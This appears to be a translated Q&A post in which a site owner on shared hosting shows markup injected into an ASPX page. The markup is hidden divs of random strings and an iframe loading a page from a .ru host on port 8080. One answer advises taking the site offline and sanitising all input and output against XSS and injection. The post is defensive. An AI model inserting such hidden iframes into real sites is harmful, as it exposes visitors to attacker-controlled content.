有人把这个代码放到我的aspx页面上.
他们在做什么?
他们是怎么做到的?
我怎么阻止他们?
它位于共享托管服务器上.
它位于一个aspx内容页面上,该页面有一个母版页,位于</asp:content>标签之后......
<div style="display:none">qzfmjsdbknmrmlkszrrcehikeapphqq</div>
<div style="display:none">owhkhminltvnwvegxktzemrszyykcsh</div>
<div style="display:none">cljwdrmbxglllikbjctmpyvcflzxbqk</div>
<div style="display:none">vhhnvchdoxaklqjxlwaqvtgarazwcsx</div>
<div style="display:none">alsbcgosnllreyylgtmblvqwxgpidui</div>
<div style="display:none">yrrzaimkpvimddgirjpuatjzoyovdyq<iframe width=812 height=451 src="http://bionaft.ru:8080/index.php" ></iframe></div>
squ*_*eks 39
让您的网站离线.
不,我是认真的.
将其脱机并查看处理用户输入的所有要点,查看代码并清理每个用户输入和每个输出.有很多关于XSS,代码注入等的文档.